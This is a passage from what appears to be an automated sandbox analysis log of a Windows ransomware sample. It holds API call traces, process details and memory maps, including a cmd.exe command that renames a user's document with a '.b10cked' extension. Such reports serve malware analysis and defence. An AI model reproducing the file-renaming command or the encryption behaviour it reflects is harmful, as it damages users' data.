lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] 
GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.703] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x200, lpOverlapped=0x0) returned 1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] GetFileType (hFile=0x4c) returned 0x1 [0234.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.703] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | 
out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ecc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ecc8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed18*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ed68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ed68*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14edb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14edb8*, lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee08*, 
lpNumberOfBytesWritten=0x14de5c*=0x50, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] GetFileType (hFile=0x4c) returned 0x1 [0234.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.704] WriteFile (in: hFile=0x4c, lpBuffer=0x14ee58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ee58*, lpNumberOfBytesWritten=0x14de5c*=0x20, lpOverlapped=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.704] ReadFile (in: hFile=0x54, lpBuffer=0x14ec78, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14de68, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesRead=0x14de68*=0x32, lpOverlapped=0x0) returned 1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] GetFileType (hFile=0x4c) returned 0x1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] GetFileType (hFile=0x4c) returned 0x1 [0234.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.705] WriteFile (in: hFile=0x4c, lpBuffer=0x14ec78*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x14de5c, lpOverlapped=0x0 | out: lpBuffer=0x14ec78*, lpNumberOfBytesWritten=0x14de5c*=0x32, lpOverlapped=0x0) returned 1 [0234.705] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.705] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14de48 | out: lpNewFilePointer=0x0) returned 1 [0234.705] _close (_FileHandle=4) returned 0 [0234.705] FindNextFileW (in: hFindFile=0x1a0e78, lpFindFileData=0x14eedc | out: lpFindFileData=0x14eedc) returned 0 [0234.705] GetLastError () returned 0x12 [0234.705] FindClose (in: hFindFile=0x1a0e78 | out: hFindFile=0x1a0e78) returned 1 [0234.706] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 
0 [0234.706] _close (_FileHandle=3) returned 0 [0234.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.706] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.706] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.706] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.706] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.706] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.707] SetConsoleInputExeNameW () returned 0x1 [0234.707] GetConsoleOutputCP () returned 0x1b5 [0234.707] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.707] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.707] exit (_Code=0) Process: id = "636" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xc88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35068 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35069 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 
35070 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35071 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 35072 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35073 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35074 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35075 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35076 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35077 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35474 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35475 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35476 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35477 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file 
name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35478 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 35479 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35480 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35481 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35482 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35483 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35484 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35485 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35486 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" 
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35487 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35488 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 35489 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35490 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35491 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 35492 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 35493 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35494 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 35495 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 35496 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 35497 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 876 os_tid = 0xc90 [0235.154] GetSystemTimeAsFileTime 
(in: lpSystemTimeAsFileTime=0x28fb5c | out: lpSystemTimeAsFileTime=0x28fb5c*(dwLowDateTime=0xbfa03000, dwHighDateTime=0x1d440a9)) [0235.154] GetCurrentProcessId () returned 0xc88 [0235.154] GetCurrentThreadId () returned 0xc90 [0235.154] GetTickCount () returned 0x40914 [0235.154] QueryPerformanceCounter (in: lpPerformanceCount=0x28fb54 | out: lpPerformanceCount=0x28fb54*=29194344712) returned 1 [0235.155] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.155] __set_app_type (_Type=0x1) [0235.155] __p__fmode () returned 0x76b331f4 [0235.155] __p__commode () returned 0x76b331fc [0235.155] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.156] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.156] GetCurrentThreadId () returned 0xc90 [0235.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc90) returned 0x38 [0235.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.156] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.156] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28faec | out: phkResult=0x28faec*=0x0) returned 0x2 [0235.156] VirtualQuery (in: lpAddress=0x28fb23, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x190000, 
AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.156] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fabc, dwLength=0x1c | out: lpBuffer=0x28fabc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.156] GetConsoleOutputCP () returned 0x1b5 [0235.156] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.157] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.157] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.157] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.157] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.157] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.157] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.157] GetEnvironmentStringsW () returned 0x801b0* [0235.158] FreeEnvironmentStringsW (penv=0x801b0) returned 1 [0235.158] GetEnvironmentStringsW () returned 0x801b0* [0235.158] 
FreeEnvironmentStringsW (penv=0x801b0) returned 1 [0235.158] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea5c | out: phkResult=0x28ea5c*=0x40) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0xe8, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x0, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegCloseKey (hKey=0x40) returned 0x0 [0235.158] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ea5c | out: phkResult=0x28ea5c*=0x40) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x40, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x1, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x0, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x4, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x4) returned 0x0 [0235.158] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ea64, lpData=0x28ea68, lpcbData=0x28ea60*=0x1000 | out: lpType=0x28ea64*=0x0, lpData=0x28ea68*=0x9, lpcbData=0x28ea60*=0x1000) returned 0x2 [0235.158] RegCloseKey (hKey=0x40) returned 0x0 [0235.159] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.159] srand 
(_Seed=0x5b8863c2) [0235.159] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" [0235.159] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\MMWJ0D~1.ODP\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\Mmwj0D0mDfuQB5wXA.odp.b10cked\"" [0235.159] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.159] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x81910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.159] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.159] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.159] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.159] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.159] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.159] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.159] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 
[0235.160] GetEnvironmentStringsW () returned 0x82300* [0235.160] FreeEnvironmentStringsW (penv=0x82300) returned 1 [0235.160] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.160] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.160] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.160] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.160] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.160] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.160] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.160] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.160] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f828 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.160] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f828, lpFilePart=0x28f824 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f824*="Desktop") returned 0x18 [0235.160] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.160] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f5a4 | out: lpFindFileData=0x28f5a4) returned 0x80040 [0235.160] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.160] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f5a4 | out: lpFindFileData=0x28f5a4) returned 0x80040 [0235.161] FindClose (in: hFindFile=0x80040 | out: hFindFile=0x80040) returned 1 [0235.161] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f5a4 | out: 
